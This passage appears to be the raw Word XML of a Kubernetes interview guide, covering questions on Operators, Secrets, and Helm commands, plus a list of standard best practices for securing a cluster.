    <w:p w14:paraId="31DD27F0"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operator: "Equal"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C51FB95"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value: "value1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402D2AFE"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effect: "NoSchedule"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD71E07"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20" w:name="_Toc178383402"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>17. What is a Kubernetes Operator?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="220"/>
    </w:p>
    <w:p w14:paraId="1AA7BE86"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An Operator is a method of packaging, deploying, and managing a Kubernetes application. Operators extend the Kubernetes API to manage complex stateful applications (e.g., databases) through custom resources. Operators are designed to handle operational tasks like backups, upgrades, and scaling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3044D533"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21" w:name="_Toc178383403"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>18. Explain Kubernetes secrets and how they are managed.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="221"/>
    </w:p>
    <w:p w14:paraId="5BB3DA0C"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Kubernetes Secrets are objects that store sensitive data, such as passwords, tokens, and keys. Secrets are base64-encoded and can be used as environment variables, files in a Pod, or as part of a volume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC0D401"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Creating a Secret:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7130C13D"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kubectl create secret generic my-secret --from-literal=username=admin --from-literal=password=secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767238AB"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Accessing a Secret:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D51CA9"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apiVersion: v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB939EA"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kind: Pod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EF9A87"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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0802B0"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name: mypod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275BE504"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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6DA472"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containers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084A62AA"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name: mycontainer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B7BE8B"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image: myimage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C15A979"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env:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56134BAA"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 name: USERNAME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4AA840"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valueFrom:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742583E0"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secretKeyRef:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E412667"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name: my-secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046B2B57" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E060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ahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          key: username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6A6DFE"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22" w:name="_Toc178383404"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>19. What is Helm, and how is it used in Kubernetes?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="222"/>
    </w:p>
    <w:p w14:paraId="740A6464"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Helm is a package manager for Kubernetes that simplifies the deployment and management of applications. Helm uses "charts," which are pre-configured Kubernetes resources, to deploy applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBA363B"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Benefits of Helm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBF5078" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="616"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Simplifies complex Kubernetes deployments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757F0008" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="616"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Supports versioning and easy upgrades/rollbacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2431173D" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="616"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Encourages reusable configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A553B08"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Example Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C65A68" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="617"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Install a chart: helm install my-release stable/mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E86F99D" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="617"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Upgrade a release: helm upgrade my-release stable/mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B22A77E" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="617"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Rollback a release: helm rollback my-release 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B808B1B" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="223" w:name="_Toc178383405"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>20. What are best practices for securing a Kubernetes cluster?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="223"/>
    </w:p>
    <w:p w14:paraId="7D6547DF" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Securing a Kubernetes cluster involves multiple layers, including the following best practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318337A4" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="618"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>RBAC:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement Role-Based Access Control to limit permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FA4B59" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="618"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Network Policies:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Define network policies to control traffic between Pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2954B9" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="618"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Secrets Management:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use Kubernetes Secrets or external solutions to manage sensitive data securely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA40A4F" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="618"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Pod Security Standards (PSS):</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enforce security context and resource limits for Pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662C4F04" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="618"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>API Server Security:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enable audit logging, restrict access to the API server, and use strong authentication and authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE02FE2" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="618"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>etcd Security:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Encrypt data at rest, restrict access to etcd, and ensure it is highly available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ED8E56" w14:textId="77777777" w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C9468E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00C9468E" w:rsidRPr="00DA2F32" w:rsidSect="00570AFB">
      <w:headerReference w:type="default" r:id="rId25"/>
      <w:footerReference w:type="default" r:id="rId26"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="306" w:right="142" w:bottom="142"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83F15" w14:textId="77777777" w:rsidR="007B6D17" w:rsidRDefault="007B6D17" w:rsidP="00570AFB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0173DE08" w14:textId="77777777" w:rsidR="007B6D17" w:rsidRDefault="007B6D17" w:rsidP="00570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9185317"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="1A7DF497" w14:textId="35AD16A1" w:rsidR="00570AFB" w:rsidRDefault="00570A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8E746" w14:textId="77777777" w:rsidR="00570AFB" w:rsidRDefault="00570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82F02" w14:textId="77777777" w:rsidR="007B6D17" w:rsidRDefault="007B6D17" w:rsidP="00570AFB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="044086E5" w14:textId="77777777" w:rsidR="007B6D17" w:rsidRDefault="007B6D17" w:rsidP="00570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84313" w14:textId="3DBB06A4" w:rsidR="002427F0" w:rsidRPr="00381C6D" w:rsidRDefault="002427F0" w:rsidP="002427F0">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:szCs w:val="16"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00381C6D">
      <w:rPr>
        <w:sz w:val="18"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>nodejs</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="1E3CE062" w14:textId="77777777" w:rsidR="002427F0" w:rsidRDefault="00242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B00"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="27C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70BA1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5C84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B1444"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="50A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D3900"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C930E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B7D81"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="284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217B3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E6EE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D32EAB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FF68C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31A68"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6264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E2419D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E1B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161632"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="578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C1347"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7E6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97748"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B07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800140"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="39B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37F06"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CC5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D82056"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="87565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7657A0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9D4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AC6089"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="618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041227"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="179A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164007"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FD8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E265E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5FF2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716AF9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4458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B93707"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A2A4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C050FC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="560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86912"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="64D0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551CBF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FEE66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70170B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="48F09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72704F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="881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B86E37"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1B1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C73DB3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8BD4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C97E39"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3C0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FB78F7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C40E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240E5E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D58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4758AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7C8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9A45A0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B38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9F072E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2E4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B60640"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B3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CD7AA6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F5348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ED4F84"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7026F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060E20"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1FE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874E83"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="946C7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9622F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F33C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987016"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="817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CF24AE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E1A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E15922"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7D68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8EE3A1D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4C06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384EFC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9E3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96CD5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="100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ED6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ADC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62213A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E59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A3542A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="342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080497"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9144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A411B24"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DAF0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911C1A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9A0C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A9E7284"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="242E5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EE6D28"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D4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032008"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0DC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556A0A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C4C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B85228C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2C1A6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B8E7A82"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="605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962FD2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A9E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B12573"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CC8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FB5668"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="50D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345922"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8ABA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4C7168"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D33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7224B9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="291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A53C94"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="70D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AD02EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3FF6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CE56A29"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0F883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CEC6DC2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E1F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EF56D1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D29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F534B9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A8322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D430072"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="938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FC1D07"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7F6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FD44BE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C450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E0F114F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7742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5210D4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="90E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96525B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="458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D529A9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="094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DD6771"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="375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FE6969"/>
    <w:multiLevelType w:val="multilevel"/>
